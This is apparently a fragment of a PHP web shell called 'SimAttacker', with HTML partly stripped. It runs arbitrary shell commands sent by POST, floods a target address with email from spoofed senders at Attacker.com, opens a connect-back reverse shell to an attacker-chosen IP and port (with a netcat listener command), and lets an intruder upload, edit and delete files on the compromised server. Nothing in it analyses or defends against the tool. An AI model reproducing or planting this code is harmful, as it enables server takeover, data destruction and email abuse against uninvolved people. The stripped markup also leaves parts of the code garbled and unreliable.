Priv8 Php

***************************************************************************
***************************************************************************

"; echo "OS :". php_uname(); echo "
IP :". ($_SERVER['REMOTE_ADDR']); echo ""; } //************************************************************ //cmd-command line $cmd=$_POST['cmd']; if($id=="cmd"){ $result=shell_exec("$cmd"); echo "

CMD ExeCute

" ; echo "
"; //send Storm Mail $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <> "" ){ for ($i = 0; $i < $nom ; $i++){ $from = rand (71,1020000000)."@"."Attacker.com"; $subject= md5("$from"); mail($to,$subject,$Comments,"From:$from"); echo "$i is ok"; } echo ""; } } //******************************************************** //Connect Back -Firewall Bypass if ($id=="cshell"){ echo "
Connect back, bypass Firewalls
For user :
nc -l -p 1019

"; $mip=$_POST['mip']; $bport=$_POST['bport']; if ($mip <> "") { $fp=fsockopen($mip , $bport , $errno, $errstr); if (!$fp){ $result = "Error: could not open socket connection"; } else { fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n"); while(!feof($fp)){ fputs ($fp," bash # "); $result= fgets ($fp, 4096); $message=`$result`; fputs ($fp,"--> ".$message."\n"); } fclose ($fp); } } } //******************************************************** //Spy File Manager $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; if ($id=="fm"){ echo "

Home: $homedir

"; echo "

"; if (is_dir($dir)){ if ($dh=opendir($dir)){ while (($file = readdir($dh)) !== false) { $fsize=round(filesize($dir . $file)/1024); echo " "; } closedir($dh); } } echo "

File / Folder Name	Size KByte	Download	Edit	Chmod	Delete
"; if (is_dir($dir.$file)) { echo " $file dir"; } else { echo " $file "; } echo "	"; if (is_file($dir.$file)) { echo "$fsize"; } else { echo " "; } echo "	"; if (is_file($dir.$file)){ if (is_readable($dir.$file)){ echo "download"; }else { echo "No ReadAble"; } }else { echo " "; } echo "	"; if (is_file($dir.$file)) { if (is_readable($dir.$file)){ echo "Edit"; }else { echo "No ReadAble"; } }else { echo " "; } echo "	"; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "Dont in windows"; } else { echo "Chmod"; } echo "	Delete

"; } //Upload Files $rpath=$_GET['dir']; if ($rpath <> "") { $uploadfile = $rpath."/" . $_FILES['userfile']['name']; print "

";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "";
echo "";
}
 }
 //file deleted
$frpath=$_GET['fdelete'];
if ($frpath <> "") {
if (is_dir($frpath)){
$matches = glob($frpath . '/*.*');
if ( is_array ( $matches ) ) {
  foreach ( $matches as $filename) {
  unlink ($filename);
  rmdir("$frpath");
echo "";
echo "";
  }
  }
  }
  else{
echo "";
unlink ("$frpath");
echo "";
exit(0);

  }
  

}
			?>

CMD ExeCute

Fake Mail- DOS E-mail By Victim Server